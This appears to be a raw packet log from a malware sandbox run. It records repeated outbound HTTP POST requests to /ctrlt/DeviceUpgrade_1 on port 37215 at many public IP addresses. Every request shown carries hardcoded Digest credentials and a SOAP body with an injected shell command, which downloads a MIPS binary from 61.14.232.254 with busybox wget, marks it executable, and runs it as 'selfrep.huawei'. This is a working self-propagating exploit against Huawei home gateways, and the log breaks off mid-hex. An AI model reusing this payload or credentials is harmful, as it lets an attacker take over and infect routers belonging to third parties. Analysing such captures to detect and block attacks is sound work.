                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  487192.168.2.1348956157.123.48.9237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.286979914 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  488192.168.2.1351524197.84.173.7337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.287003994 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  489192.168.2.1360318157.187.43.19737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.287019014 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  490192.168.2.1345738100.152.89.22537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.287044048 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  491192.168.2.1356814197.235.20.5837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.287061930 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  492192.168.2.135510448.102.232.24337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.287084103 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  493192.168.2.1360054197.240.12.2337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.287101030 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  494192.168.2.1354810204.240.74.21237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.287118912 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  495192.168.2.133433841.26.37.20637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.287137985 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  496192.168.2.133315648.15.157.20237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.287157059 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 